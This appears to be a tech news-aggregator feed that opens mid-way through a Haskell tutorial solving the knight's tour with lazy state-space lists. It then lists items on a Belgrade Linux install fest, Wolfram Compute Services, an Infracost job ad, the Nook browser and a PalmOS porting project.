Functional languages excel at wholemeal programming, a term coined by Geraint Jones. Wholemeal programming means to think big: work with an entire list, rather than a sequence of elements; develop a solution space, rather than an individual solution; imagine a graph, rather than a single path. The wholemeal approach often offers new insights or provides new perspectives on a given problem. It is nicely complemented by the idea of projective programming: first solve a more general problem, then extract the interesting bits and pieces by transforming the general program into more specialised ones.

So instead of exploring the solution space step by step, we'll create a list of the whole solution space at once, and then use that list to solve the problem we are interested in. Then I'm sure we'll find something new to learn about programming and problem-solving.

The first issue to tackle is, how can we possibly represent the whole solution space? It might be huge. Lucky for us, Haskell is lazy by default, so we can just pretend that we have the full list, but actually compute it fully only on demand.

Next, since we are going to deal with a state space, what are the actual states that we will be working with?

We can encode a single state in the tour with this record 7 :

data TourState = TourState
  { board :: Board
  , visited :: [KnightPos]
  , moves :: [KnightMove]
  , current :: KnightPos
  }

These are basically the arguments to the original tour function wrapped up in a single record (with some more civilized wrapper types) 8 .

To be able to explore the state space, we need a way to move between states. For that we can define:

moveState :: TourState -> KnightMove -> Maybe TourState

Given a single state and a move, we compute the next state by calculating the new position and updating the list of moves. Since not every move is legal from a given state, we accommodate possible failure with a Maybe . If we can't move to the next state the result will be Nothing .

You can see the implementation in the repo , but it's basically the same logic that we had before, just adapted to using TourState .
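For a self-contained read, here is a minimal sketch of what that implementation might look like. It assumes KnightPos is a plain coordinate pair and that isValid mirrors the earlier check; the repo's version is authoritative:

-- A sketch only; see the repo for the real implementation.
moveState :: TourState -> KnightMove -> Maybe TourState
moveState st move =
  let (dx, dy) = moveValue move
      (row, col) = current st        -- assuming KnightPos is a coordinate pair
      nextPos = (row + dx, col + dy)
   in if isValid (board st) (visited st) nextPos
        then Just st { visited = visited st ++ [nextPos]
                     , moves = moves st ++ [move]
                     , current = nextPos }
        else Nothing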

With moveState we can apply one move to a state. Next we want to try out all the possible knight moves from a state. The signature will be:

nextStates :: TourState -> [TourState]

From a given TourState generate all possible (legal) states that can be reached by a single step. Here's the implementation:

nextStates state = mapMaybe (moveState state) allKnightMoves

We take all the possible knight moves and with the help of mapMaybe apply moveState from the current state to every element in the list of moves. mapMaybe takes care of removing all the Nothing entries, so that we end up with a flat list with just the legal states we can reach.

This is actually our first example of using wholemeal programming. Notice how we didn't iterate step by step. Instead of thinking about moving between individual knight moves, we applied the moving logic to the whole list with mapMaybe .

With these helpers we are now ready to create a (potentially) infinite list of all the states that we can be in while searching for a tour from the initial state. Concretely, we need to implement the following signature:

allStatesFrom :: TourState -> [TourState]

Given a single state, we create a list of all the states that can be reached from it.

Creating an infinite list of steps might sound intimidating, but we'll do it anyways:

allStatesFrom state = -- 1
  let
    next = nextStates state -- 2
    allTheRest = concatMap allStatesFrom next -- 3
  in
    state : allTheRest -- 4

We start from the initial state (1), and we compute all the legal next states using nextStates (2). This is one step into the search. Next, we want to take the next steps from each of these new states. We do it by recursively 9 calling allStatesFrom on each of the next states (3). concatMap flattens all the resulting lists into one big list. We construct the full list of states by prepending the initial state to allTheRest with all the deeper steps (4).

And just like that we have a list that represents all the possible states in the problem we are solving. This is a bit mind-bending, take a moment to let the tricky recursion sink in properly.

Notice how "wholesome" this code is. We don't deal with edge cases or stopping conditions, we just generated the whole thing in one fell swoop. Nor do we worry about going off into infinity, laziness prevents this list from being computed prematurely 10 .
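If you want to convince yourself that nothing runs off to infinity, demand just a prefix (a throwaway sketch, where start is any initial TourState):

-- Forces only the first five states, not the whole space.
firstFive = take 5 (allStatesFrom start)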

With this list in hand, it's almost trivial to solve the knight's tour problem. We just need to find the first state from the list that covers the whole board.

We can define the stopping condition like so:

isComplete TourState{board, visited} =
  boardSize board == length visited

This function determines whether a given state is a solution by checking the size of the list of visited positions (which happens to be the same as the stopping condition in the original Python solution).

With these two building blocks in hand, a list of states and a stopping condition, we can easily compose them into a single solution:

tour :: Board -> KnightPos -> Maybe [KnightMove]
tour board pos = -- 1
  let
    -- 2
    init = initState board pos
    -- 3
    finalState = find isComplete (allStatesFrom init)
  in
    fmap getMoves finalState -- 4

Step by step:

  • The final tour function takes in a board and an initial position (1)
  • From this we build the initial state (2), which just initializes a fresh instance of TourState with the current position and an empty list of moves
  • Now for the highlight of this solution, we use find (3) to locate the first TourState that matches isComplete in the full list of states that we generated from the initial state
  • The final result (4) just extracts the moves from the state that we found (which might be missing, hence the fmap call)

I find this approach to be breathtakingly elegant. Thanks to the classic "Why Functional Programming Matters" paper for the inspiration. Not only does it work, but now we have an opportunity to learn something truly novel.

What Did We Learn?

With such a strikingly different solution, we are bound to learn something new. Here are a few lessons that we can take away from this.

Laziness

To generate the list of states we used laziness in an essential, non-contrived way. Without laziness, the list could potentially overflow memory or take too much time to compute upfront, making it impractical to generate "the whole state space".

Haskell's built-in laziness makes this invisibly seamless (for better or for worse), but the lesson we learn here is applicable almost anywhere. Once we recognize the need for laziness, we can use an appropriate technique to achieve it in pretty much any modern language, be it generators in Python, streams/iterators in Java, or any streaming library in any language.
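For example, a rough Python analogue of allStatesFrom written as a generator is lazy by construction (next_states here is a hypothetical counterpart of the Haskell helper):

def all_states_from(state):
    # Yield the current state, then lazily explore everything reachable from it.
    yield state
    for nxt in next_states(state):
        yield from all_states_from(nxt)

# Consumers pull only what they need, e.g. the first complete tour:
# next((s for s in all_states_from(init) if is_complete(s)), None)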

Laziness, in its conceptual form, is a powerful tool we can use anywhere. And developing an intuition for it from lazy Haskell lists makes the approach to it relatively gentle.

Explicit State Space

The way we went about exploring the state space forced us to actually think about that space. What are the possible states? How do we move between them?

This was explicitly reified in the TourState type and the moveState function.

The state space exists independently of whether we bother to acknowledge it or not. But my feeling is that when thinking imperatively about code it's much easier to "miss the forest for the trees". Focusing on each step we are making in some iterative loop tends to hide the significance of the state space as a whole from us.

Whether or not you're applying functional programming to your code, keeping in mind the state space can only be beneficial. If only for something like " make illegal states unrepresentable ".

Modularity

By separating the exploration of the state space from the stopping condition, we made the code much more modular than it was before. Previously we had to intertwine the stopping condition directly into the iteration, but no more.

This kind of modularity opens the door to many possible modifications that we can apply to one part of the code without disturbing the others.

Some examples:

  • We can change the stopping condition without touching the state space exploration logic. Instead of using find to find the first solution, we could search for all solutions. Or we could search only for "closed tours" (where the final cell is adjacent to the initial cell).
  • In the solution code we are exploring the state space using a preorder depth-first traversal. We can easily adapt it to be any other depth-first traversal, or with some more effort we can make it into any traversal order we want.
  • The current algorithm is a naive brute-force approach, we can make things faster by pruning the state space list with heuristics, like applying Warnsdorf's rule .

The important thing is that we can make all these changes by modifying only the code that is responsible for it, without touching its surroundings. This also means that everything can be tested separately without having to test unrelated parts.

Contrast this to the original code where there's no way to modify or test anything without touching everything else. The stopping condition sits smack in the middle of iteration.

That's a level of modularity that takes some effort to achieve with procedural code, but flows out naturally from the wholemeal approach to solving problems.

Composition

Complementing modularity we have composition 11 .

It's one thing to split things into modules, but another thing is how easy it is to compose the modules back into a single piece of code that actually solves the full problem.

In our case it was very easy, just a call to find along with the state space list and the completion predicate. And the same applies to all the different variants described in the previous section. We can easily mix and match the different implementations to generate new working pieces of software.

Using higher-order functions ( find ) as the glue for simple, purely-functional (or side-effect-free) components is a great recipe to obtain code with good composition properties.

Quoting from Tony Morris :

Suppose any function that exists. I will suppose one that is made of parts A, B, C and D. I might denote this A ∘ B ∘ C ∘ D. Now suppose you desire a function that is made of parts A, B, C and E. Then the effort required for your function should be proportional to the effort required for E alone.

The closer you are to achieving this objective for any function, the closer you are to the essence of (pure) functional programming. This exists independently of the programming language, though programming languages will vary significantly in the degree to which they accommodate this objective.

Imperative programming – specifically the scope of a destructive update – is the anti-thesis of this objective.

Wholemeal Programming

Tying all these concepts together is wholemeal programming, showing us how to tackle problems with a wholly different mindset.

Not only does it force us to think differently about problem-solving, but it brings concrete, practical advantages to the code we produce.

Although it's possible to see every one of these advantages in other paradigms, functional programming really shines in making those advantages stand out. Once you learn about them, you can apply them pretty much anywhere. You just need to stop mechanically translating your existing knowledge and break away from everything you think you know.

So what's the point of learning functional programming? You tell me...

Friday Nite Videos | December 5, 2025

Portside
portside.org
2025-12-06 01:36:39
Friday Nite Videos | December 5, 2025 ...
Original Article

Friday Nite Videos | December 5, 2025

You Got Gold—A Celebration of John Prine. Trump’s War on Drug Traffickers ... Except This One. Gaza Children Return to School! This Island Might Help Us Understand the Origins of Life. Zohran Mamdani & Bernie Sanders Join Striking Starbucks Workers


Linux Install Fest Belgrade

Hacker News
dmz.rs
2025-12-06 10:20:19
Comments...
Original Article

Where and when

Linux Install Fest will be held on December 9, 2025 in the JAG3 classroom of the Faculty of Mathematics, at Jagićeva 5, Belgrade . Entry to the classroom is possible from 6 pm to 9 pm.

Jagićeva street is located between the Pijaca Đeram station where trams 5, 6, 7L and 14 stop, and the Crveni krst station where buses 21 and 83 stop, as well as trolleybuses 19, 22 and 29.

Program schedule

The goal of the gathering is to help interested attendees install the Linux operating system on their laptops. Several people with working Linux experience will be present at the event. In addition, depending on the interest of those present, short trainings on the command line, git, web services, C programming, etc. can be held.

After 9 p.m., we can continue socializing in one of the nearby bars.

Linux distributions

Linux is the core of the operating system, on which other programs are installed. All of these together make up a particular Linux distribution . There are many distributions, but we recommend the ones with a long tradition like the following:

  • The Debian distribution is probably the most suitable for Linux beginners. Known derivatives of Debian are Ubuntu, Mint and Zorin.
  • Fedora is also suitable for Linux beginners. It differs from Debian by releasing new versions faster, which in practice means that users get newer versions of programs, but the system can potentially be less stable than Debian.
  • Arch is a Linux distribution that allows the user to easily configure all parts of the system. This distribution is intended for people with significant Linux experience.

If you are a beginner and haven't decided which distribution you want to install, we recommend Fedora or Debian. Regardless of which distribution you have, you will be able to run all programs intended for Linux.

End of 10

This year's Linux Install Fest is organized as part of the global End of 10 campaign, which promotes the Linux operating system as a replacement for Windows 10.

For a long time now, the Windows operating system has been becoming increasingly unfriendly to users. By contrast, many Linux distributions have greatly improved the user experience, and today we can claim that Linux enables significantly more pleasant work, regardless of the user's technical knowledge.

Windows imposes on users functionality that they do not want, such as cloud integrations, AI, advertisements, mandatory accounts, and the like. These features serve above all to increase Microsoft's profits and have no benefit for most end users. Also, basic programs such as calendars, calculators or text editors have become slow and full of bugs. Weighed down by useless functionality, Windows becomes more demanding every year and requires the purchase of better hardware, leading to an increase in electronic waste. Unlike Windows, the latest Linux distributions work very well on computers that are more than a decade old.

The choice of an operating system is no longer just a technical decision, but also an environmental attitude.

Installation methods

We can install Linux in three ways:

  1. Inside a virtual machine on Windows. In this way, the user retains their existing operating system and the data on it. Linux in a virtual machine will be significantly slower than an installation without virtualization.
  2. Alongside the existing operating system. If it is possible to shrink one of your partitions and free up at least 10GB of space, you can install a Linux operating system alongside Windows. When booting the computer, the user can choose whether to boot Windows or Linux. With such an installation, there is some risk that a subsequent Windows update will reset the bootloader settings, after which a small intervention is required to make the Linux system accessible again.
  3. By completely removing the Windows system. In place of the Windows partition, a new partition with the Linux distribution will be placed. Additional partitions that exist may or may not be removed.

Before arrival

In order for the installation to go smoothly, before coming to the Linux Install Fest you should back up the data from the system partition if you decide on the second or third installation option. If you have two partitions (for example, C and D), move the data from the system partition (C:) that you want to keep to the non-system partition (D:). If you don't have an additional partition, you can use a USB flash drive. Pay attention to the files inside the user directory (Desktop, Downloads, Documents, ...), and export bookmarks and passwords from the browser.

Also, before you arrive, you can familiarize yourself with the look and feel of various Linux distributions. You can try some distributions in your browser, without any installation, on the DistroSea website (sometimes you need to wait briefly for resources on the site to free up). Note that an operating system running on this site is many times slower than a system installed on your computer.

Organizer

The organizer of the event is Decentrala - a group of enthusiasts gathered around the ideas of decentralization and free dissemination of knowledge. So far, we have organized more than 300 events , and we regularly announce the next events on the Events page.

In the following period, two more events for Linux beginners will be held at the same location (classroom JAG3):

  • Tuesday December 16 - Introduction to the Linux command line
  • Tuesday, December 23 - Introduction to Git

Events start at 6pm.

Ponovo

You can bring defective devices to the Linux install fest: laptops, phones, desktop computers, monitors... We will deliver them to the organization Ponovo in Kikinda during January. This organization will repair these devices and thereby prevent the increase of electronic waste.

Ask HN: How many people got VPNs in response to laws like UK Online Safety Act?

Hacker News
news.ycombinator.com
2025-12-06 09:28:59
Comments...
Original Article

I was trying to follow a tutorial the other day and couldn't because the embedded images were on Imgur and it was so frustrating. It was the straw that broke the camel's back.

I caved, bought a 3 year PIA plan, had my router configured within about 2 minutes (actually impressed how straightforward Unifi made it) and now my browsing experience is fixed.

Schizophrenia sufferer mistakes smart fridge ad for psychotic episode

Hacker News
old.reddit.com
2025-12-06 07:31:07
Comments...

Wolfram Compute Services

Hacker News
writings.stephenwolfram.com
2025-12-06 07:21:42
Comments...
Original Article

Instant Supercompute: Launching Wolfram Compute Services

To immediately enable Wolfram Compute Services in Version 14.3 Wolfram Desktop systems, run:

RemoteBatchSubmissionEnvironment["WolframBatch"]

(The functionality is automatically available in the Wolfram Cloud .)

Scaling Up Your Computations

Let’s say you’ve done a computation in Wolfram Language . And now you want to scale it up. Maybe 1000x or more. Well, today we’ve released an extremely streamlined way to do that. Just wrap the scaled up computation in RemoteBatchSubmit and off it’ll go to our new Wolfram Compute Services system . Then—in a minute, an hour, a day, or whatever—it’ll let you know it’s finished, and you can get its results.

For decades I’ve often needed to do big, crunchy calculations ( usually for science ). With large volumes of data, millions of cases, rampant computational irreducibility , etc. I probably have more compute lying around my house than most people—these days about 200 cores worth. But many nights I’ll leave all of that compute running, all night—and I still want much more. Well, as of today, there’s an easy solution—for everyone: just seamlessly send your computation off to Wolfram Compute Services to be done, at basically any scale.

For nearly 20 years we’ve had built-in functions like ParallelMap and ParallelTable in Wolfram Language that make it immediate to parallelize subcomputations. But for this to really let you scale up, you have to have the compute. Which now—thanks to our new Wolfram Compute Services—everyone can immediately get.

The underlying tools that make Wolfram Compute Services possible have existed in the Wolfram Language for several years. But what Wolfram Compute Services now does is to pull everything together to provide an extremely streamlined all-in-one experience. For example, let’s say you’re working in a notebook and building up a computation. And finally you give the input that you want to scale up. Typically that input will have lots of dependencies on earlier parts of your computation. But you don’t have to worry about any of that. Just take the input you want to scale up, and feed it to RemoteBatchSubmit . Wolfram Compute Services will automatically take care of all the dependencies, etc.

And another thing: RemoteBatchSubmit , like every function in Wolfram Language, is dealing with symbolic expressions, which can represent anything—from numerical tables to images to graphs to user interfaces to videos, etc. So that means that the results you get can immediately be used, say in your Wolfram Notebook, without any importing, etc.

OK, so what kinds of machines can you run on? Well, Wolfram Compute Services gives you a bunch of options , suitable for different computations, and different budgets. There’s the most basic 1 core, 8 GB option—which you can use to just “get a computation off your own machine”. You can pick a machine with larger memory—currently up to about 1500 GB. Or you can pick a machine with more cores—currently up to 192. But if you’re looking for even larger scale parallelism Wolfram Compute Services can deal with that too. Because RemoteBatchMapSubmit can map a function across any number of elements, running on any number of cores, across multiple machines.

A Simple Example

OK, so here’s a very simple example—that happens to come from some science I did a little while ago . Define a function PentagonTiling that randomly adds nonoverlapping pentagons to a cluster:

For 20 pentagons I can run this quickly on my machine:

But what about for 500 pentagons? Well, the computational geometry gets difficult and it would take long enough that I wouldn’t want to tie up my own machine doing it. But now there’s another option: use Wolfram Compute Services!

And all I have to do is feed my computation to RemoteBatchSubmit :
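(The submitted input appears in the original as a notebook evaluation; schematically, it is just the following, with PentagonTiling as defined above:)

job = RemoteBatchSubmit[PentagonTiling[500]]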

Immediately, a job is created (with all necessary dependencies automatically handled). And the job is queued for execution. And then, a couple of minutes later, I get an email:

Email confirming batch job is starting

Not knowing how long it’s going to take, I go off and do something else. But a while later, I’m curious to check how my job is doing. So I click the link in the email and it takes me to a dashboard—and I can see that my job is successfully running:

Wolfram Compute Services dashboard

I go off and do other things. Then, suddenly, I get an email:

Email confirming batch job success

It finished! And in the mail is a preview of the result. To get the result as an expression in a Wolfram Language session I just evaluate a line from the email:

And this is now a computable object that I can work with, say computing areas

or counting holes:

Large-Scale Parallelism

One of the great strengths of Wolfram Compute Services is that it makes it easy to use large-scale parallelism. You want to run your computation in parallel on hundreds of cores? Well, just use Wolfram Compute Services!

Here’s an example that came up in some recent work of mine. I’m searching for a cellular automaton rule that generates a pattern with a “lifetime” of exactly 100 steps. Here I’m testing 10,000 random rules—which takes a couple of seconds, and doesn’t find anything:

To test 100,000 rules I can use ParallelSelect and run in parallel, say across the 16 cores in my laptop:

Still nothing. OK, so what about testing 100 million rules? Well, then it’s time for Wolfram Compute Services. The simplest thing to do is just to submit a job requesting a machine with lots of cores (here 192, the maximum currently offered):
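(Again, the original input is a notebook evaluation; its shape is roughly the following, where lifetimeIs100Q is a hypothetical stand-in for my rule-testing predicate and the candidates are random rule numbers:)

job = RemoteBatchSubmit[
  ParallelSelect[RandomInteger[{0, 2^32 - 1}, 10^8], lifetimeIs100Q],
  RemoteMachineClass -> "Compute192x384"]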

A few minutes later I get mail telling me the job is starting. After a while I check on my job and it’s still running:

Email confirming batch job is starting

I go off and do other things. Then, after a couple of hours I get mail telling me my job is finished. And there’s a preview in the email that shows, yes, it found some things:

Email confirming batch job success

I get the result:

And here they are—rules plucked from the hundred million tests we did in the computational universe:

But what if we wanted to get this result in less than a couple of hours? Well, then we’d need even more parallelism. And, actually, Wolfram Compute Services lets us get that too—using RemoteBatchMapSubmit . You can think of RemoteBatchMapSubmit as a souped up analog of ParallelMap —mapping a function across a list of any length, splitting up the necessary computations across cores that can be on different machines, and handling the data and communications involved in a scalable way.

Because RemoteBatchMapSubmit is a “pure Map”, we have to rearrange our computation a little—making it run 100,000 cases of selecting from 1000 random instances:

The system decided to distribute my 100,000 cases across 316 separate “child jobs”, here each running on its own core. How is the job doing? I can get a dynamic visualization of what’s happening:

And it doesn’t take many minutes before I’m getting mail that the job is finished:

Email providing job details

And, yes, even though I only had to wait for 3 minutes to get this result, the total amount of computer time used—across all the cores—is about 8 hours.

Now I can retrieve all the results, using Catenate to combine all the separate pieces I generated:

And, yes, if I wanted to spend a little more, I could run a bigger search, increasing the 100,000 to a larger number; RemoteBatchMapSubmit and Wolfram Compute Services would seamlessly scale up.

It’s All Programmable!

Like everything around Wolfram Language, Wolfram Compute Services is fully programmable. When you submit a job, there are lots of options you can set. We already saw the option RemoteMachineClass which lets you choose the type of machine to use. Currently the choices range from "Basic1x8" (1 core, 8 GB) through "Basic4x16" (4 cores, 16 GB) to “parallel compute” "Compute192x384" (192 cores, 384 GB) and “large memory” "Memory192x1536" (192 cores, 1536 GB).

Different classes of machine cost different numbers of credits to run. And to make sure things don’t go out of control, you can set the options TimeConstraint (maximum time in seconds) and CreditConstraint (maximum number of credits to use).
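Put together, a submission with those options might look roughly like this (a sketch: the computation and the constraint values here are illustrative, not taken from the examples above):

    RemoteBatchSubmit[
      Total[RandomReal[1, 10^8]],
      RemoteMachineClass -> "Memory192x1536",
      TimeConstraint -> 3600,      (* give up after an hour *)
      CreditConstraint -> 100      (* spend at most 100 credits *)
     ]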

Then there’s notification. The default is to send one email when the job is starting, and one when it’s finished. There’s an option RemoteJobName that lets you give a name to each job, so you can more easily tell which job a particular piece of email is about, or where the job is on the web dashboard. (If you don’t give a name to a job, it’ll be referred to by the UUID it’s been assigned.)

The option RemoteJobNotifications lets you say what notifications you want, and how you want to receive them. There can be notifications whenever the status of a job changes, or at specific time intervals, or when specific numbers of credits have been used. You can get notifications either by email, or by text message. And, yes, if you get notified that your job is going to run out of credits, you can always go to the Wolfram Account portal to top up your credits.

There are many properties of jobs that you can query. A central one is "EvaluationResult". But, for example, "EvaluationData" gives you a whole association of related information:

If your job succeeds, it’s pretty likely "EvaluationResult" will be all you need. But if something goes wrong, you can easily drill down to study the details of what happened with the job, for example by looking at "JobLogTabular".
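In practice that drill-down is just more property queries on the job object (a sketch, using the property names mentioned above):

    job["EvaluationResult"]   (* the result expression itself *)
    job["EvaluationData"]     (* association of result plus related information *)
    job["JobLogTabular"]      (* the job's log, for post-mortem debugging *)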

If you want to know all the jobs you’ve initiated, you can always look at the web dashboard, but you can also get symbolic representations of the jobs from:

For any of these job objects, you can ask for properties, and you can for example also apply RemoteBatchJobAbort to abort them.

Once a job has completed, its result will be stored in Wolfram Compute Services—but only for a limited time (currently two weeks). Of course, once you’ve got the result, it’s very easy to store it permanently, for example, by putting it into the Wolfram Cloud using CloudPut[expr]. (If you know you’re going to want to store the result permanently, you can also do the CloudPut right inside your RemoteBatchSubmit.)
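As a sketch (the cloud object name and the computation are placeholders of mine):

    RemoteBatchSubmit[CloudPut[longComputation[], "myBatchResult"]]

after which CloudGet["myBatchResult"] retrieves the stored result whenever you want it, with no two-week limit.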

Talking about programmatic uses of Wolfram Compute Services, here’s another example: let’s say you want to generate a compute-intensive report once a week. Well, then you can put together several very high-level Wolfram Language functions to deploy a scheduled task that will run in the Wolfram Cloud to initiate jobs for Wolfram Compute Services:
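A minimal sketch of that kind of deployment (makeReport and the names here are placeholders, not from the original):

    CloudDeploy[
      ScheduledTask[
        RemoteBatchSubmit[CloudPut[makeReport[], "weekly-report"]],
        "Weekly"
       ],
      "weekly-report-task"
     ]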

And, yes, you can initiate a Wolfram Compute Services job from any Wolfram Language system, whether on the desktop or in the cloud.

And There’s More Coming…

Wolfram Compute Services is going to be very useful to many people. But actually it’s just part of a much larger constellation of capabilities aimed at broadening the ways Wolfram Language can be used.

Mathematica and the Wolfram Language started—back in 1988—as desktop systems. But even at the very beginning, there was a capability to run the notebook front end on one machine, and then have a “remote kernel” on another machine. (In those days we supported, among other things, communication via phone line!) In 2008 we introduced built-in parallel computation capabilities like ParallelMap and ParallelTable. Then in 2014 we introduced the Wolfram Cloud—both replicating the core functionality of Wolfram Notebooks on the web, and providing services such as instant APIs and scheduled tasks. Soon thereafter, we introduced the Enterprise Private Cloud—a private version of Wolfram Cloud. In 2021 we introduced Wolfram Application Server to deliver high-performance APIs (and it’s what we now use, for example, for Wolfram|Alpha). Along the way, in 2019, we introduced Wolfram Engine as a streamlined server and command-line deployment of Wolfram Language. Around Wolfram Engine we built WSTPServer to serve Wolfram Engine capabilities on local networks, and we introduced WolframScript to provide a deployment-agnostic way to run command-line-style Wolfram Language code. In 2020 we then introduced the first version of RemoteBatchSubmit, to be used with cloud services such as AWS and Azure. But unlike with Wolfram Compute Services, this required “do it yourself” provisioning and licensing with the cloud services. And, finally, now, that’s what we’ve automated in Wolfram Compute Services.

OK, so what’s next? An important direction is the forthcoming Wolfram HPCKit—for organizations with their own large-scale compute facilities to set up their own back ends to RemoteBatchSubmit, etc. RemoteBatchSubmit is built in a very general way that allows different “batch computation providers” to be plugged in. Wolfram Compute Services is initially set up to support just one standard batch computation provider: "WolframBatch". HPCKit will allow organizations to configure their own compute facilities (often with our help) to serve as batch computation providers, extending the streamlined experience of Wolfram Compute Services to on-premise or organizational compute facilities, and automating what is often a rather fiddly process of job submission (which, I must say, personally reminds me a lot of the mainframe job control systems I used in the 1970s).

Wolfram Compute Services is currently set up purely as a batch computation environment. But within the Wolfram System, we have the capability to support synchronous remote computation, and we’re planning to extend Wolfram Compute Services to offer this—allowing one, for example, to seamlessly run a remote kernel on a large or exotic remote machine.

But this is for the future. Today we’re launching the first version of Wolfram Compute Services. Which makes “supercomputer power” immediately available for any Wolfram Language computation. I think it’s going to be very useful to a broad range of users of Wolfram Language. I know I’m going to be using it a lot.

Infracost (YC W21) is hiring Sr Node Eng to make $600B/yr cloud spend proactive

Hacker News
www.ycombinator.com
2025-12-06 07:00:14
Comments...
Original Article

Shift FinOps Left: Proactively Find & Fix Cloud Cost Issues

Senior Product Engineer (Node.js)

$90K - $170K Remote

Role

Engineering, Full stack

Visa

US citizenship/visa not required

Skills

Node.js, React, TypeScript, PostgreSQL


About the role

Help engineers fix what matters. You’ll work closely with PMs, designers, and engineers to build fast, reliable backends that power real-time infrastructure insights for thousands of engineers.

What we’re looking for:

  • GMT+2 to GMT-6 time zone
  • Strong Node.js and TypeScript experience. You know how to track down memory leaks and performance issues.
  • You can write complex PostgreSQL queries, understand query plans, and know when to reach for indexes, window functions, or CTEs. You’ve debugged deadlocks, optimized slow queries, and can untangle gnarly data models.
  • You move fast. You get a dopamine hit every time you release to production, and jump on issues without hesitation.
  • You've built something from scratch that you're proud of.
  • You’ll thrive in an amazing, experienced, hardworking, respectful, supportive, and fun team.
  • (Preferred) You've worked with GraphQL and understand how to design flexible, efficient schemas.

Examples of challenges we have worked on recently:

  • Scaled to support customers with thousands of GitHub organizations and tens of thousands of repositories. This has required us to overhaul our APIs, interfaces, onboarding processes, infrastructure, and more.
  • Automatically fixing infrastructure issues. With infrastructure changes there's a lower tolerance for AI-generated slop - there aren't the same safety nets in terms of testing, and the risk is often higher. We've been iterating on our system that combines AI-generated changes with our best-in-class static analysis engine to robustly open good-quality PRs to fix the most important issues for our customers.
  • Built the Issue Explorer, a frontend and backend system for surfacing infrastructure issues at scale. We had to balance performance, UX, and data complexity to let enterprise customers filter, group, and chart tens of thousands of issues across their entire codebase.

What we value:

  1. Ustomer, not customer : It is all about seeing us and the customer as one. We like to be a part of the user’s team, and help them however we can. If the user is not successful, then we will not be either so we try to walk in their shoes. It's more than work - we build relationships and community with users and customers.
  2. Open is our core : Put yourself out there. Show your learning. Transparency builds confidence. Encourage sharing the good and the bad. The best decisions are made when everyone has access to all the data. Be straightforward and kind, feedback is about your work not your person.
  3. Let's JEDI: Let’s Just Effing Do It! Own it and move fast. A good plan fiercely executed now is better than a perfect plan later. We ask for help and unblock each other. The main thing is to keep the main thing the main thing.

Benefits:

  • Work remotely, no commuting
  • Regular company meet-ups
  • Employee-friendly equity terms, including a 10 year exercise window
  • 401k matching (US)
  • Health, dental, and vision insurance (US)
  • 31 days paid leave per year (includes national holidays)
  • 12 weeks paid parental leave

About the interview

  • 25 minute initial chat
  • Two or three 55 minute technical interviews (including code walkthrough)
  • 55 minute value-based interview

About Infracost

$600B is spent on cloud each year, but no one knows the cost until it's too late. We’re changing that.

Since launching Infracost in 2021, we’ve been pulled by engineers who all want to Shift FinOps Left. We enable them to proactively find and fix cloud cost issues before they hit production. We plug directly into developer workflows (like GitHub and Azure Repos), show cost impact in pull requests, enforce tagging and FinOps best practices, and even generate PRs to fix issues automatically.

We're backed by Sequoia, YC and trusted by Fortune 500 enterprises. You'll join a small, experienced, and supportive team that's shipping fast, solving real infrastructure problems, and having fun while doing it.

Whether you're an engineer tackling complex systems (e.g. parsing massive Terraform repos, scaling real-time systems), a product manager shaping strategy from real customer pain points, or a customer success lead working directly with users, there’s meaningful work here for you. If you care about cloud efficiency, great UX, and helping teams move faster and smarter, we’d love to work with you!

Infracost

Founded: 2020

Batch: W21

Team Size: 20

Status: Active


Nook Browser

Hacker News
browsewithnook.com
2025-12-06 03:32:56
Comments...
Original Article

Browse. It's yours.
Open-source, Private, Forever.

The memory of web browsing being quick and easy lives with us all. Fewer pop-ups, less clutter, and finding what you need ASAP.


Fast by design

Minimal overhead. Less clutter. Pages feel instant, powered by WebKit.

Optional, Opt-In AI

When enabled, AI features provide helpful tools such as chat assistance, summaries, up-to-date web insights, and more.

Open-source forever

Transparent code, permissive license, and a community-driven roadmap.

Our pledge

  • No selling of browsing data. Ever.
  • Features ship when they’re stable and accessible.
  • We keep settings understandable and reversible.


Albert Michelson's Harmonic Analyzer (2014) [pdf]

Hacker News
engineerguy.com
2025-12-06 03:21:46
Comments...
Original Article
PDF link: https://engineerguy.com/fourier/pdfs/albert-michelsons-harmonic-analyzer.pdf

PalmOS on FisherPrice Pixter Toy

Hacker News
dmitry.gr
2025-12-06 03:17:44
Comments...
Original Article

rePalm Photo Album (constantly updated)

Table of Contents

  1. Blog-style updates
    1. BLOG
    2. Dec 5, 2025 - Pixter
      1. Getting started with Pixter
      2. Initial Slow Pixter Color Bringup
      3. The Worst ARM SoC I've Seen Yet
      4. Pixter Memories
      5. Pixter Displays
      6. Making Pixter IrDA work
      7. Getting and Flashing the Pixter Carts
      8. Pixter Polish
      9. Battery State
      10. ARM7 quirks
        1. What exactly does ARM7 do with PC[1] in ARM mode?
      11. Pixter Multimedia
      12. Some More Pixter Polish
      13. Pixter Results
    3. Nov 2, 2025 - summary of what you missed
  2. The original article about the start of the project
    1. PalmOS Architecture (and a bit of history)
      1. History
      2. Modules? Libraries? DALs? Drivers?
    2. Towards the first unauthorized PalmOS port
      1. So what's so hard?
      2. ROM formats are hard
      3. So write a DAL and you're done!
      4. Minimal DAL
      5. Drawing is hard
      6. Theft is a form of flattery, right?
      7. Meticulously-performed imitation is also a form of flattery, no?
      8. Virtual SD card
      9. Which device ROM are you using?
      10. So you're done, right? It works?
    3. Towards the first pirate PalmOS device
      1. A little bit about normal PalmOS 5.x devices, their CPUs, and the progress since...
      2. ARMv7M
      3. My kingdom for an ARM!
      4. But what if we try?
    4. We need hardware, but developing on hardware is ... hard
      1. CortexEmu to the rescue
      2. Waaaah! You promised real hardware
    5. Um, but now we need a kernel...
      1. Need a kernel? Why not Linux?
    6. So, uh, what about all that pesky ARM code?
      1. The ARM code still was a problem
      2. You do not mean...?
      3. But isn't writing an emulator in C kind of slow?
      4. So, is it fast enough now?
    7. You do not mean...? (pt2)
      1. Just in time: this
      2. JITs: how do we start?
      3. Parlez-vous ARM?
      4. 2 Thumbs do not make an ARM
    8. A JIT's job is never over
      1. LDM and STM, may they burn in hell forever!
        1. How LDM/STM work in ARM
        2. How LDM/STM work in Thumb2
        3. But wait, there's more ... pain
        4. Translating LDM/STM
      2. Slightly less hellish instructions
      3. Conditional instructions
      4. Jumps & Calls
      5. Translating a TU
      6. And if the TC is full?
      7. Growing up
      8. The Cortex-M0 backend
        1. Why this is insane
        2. The basics
        3. Fault dispatching
    9. Is PACE fast enough?
      1. Those indirect jumps...
      2. A special solution for a special problem
      3. Any 68k emulator...
    10. But, you promised hardware...
      1. Hardware has bugs
      2. So why the 0x80000000 limit?
      3. Two wrongs do not make a right, but do two nasty hacks?
    11. Tales of more PalmOS reverse engineering
      1. SD-card Support
      2. Serial Port Support
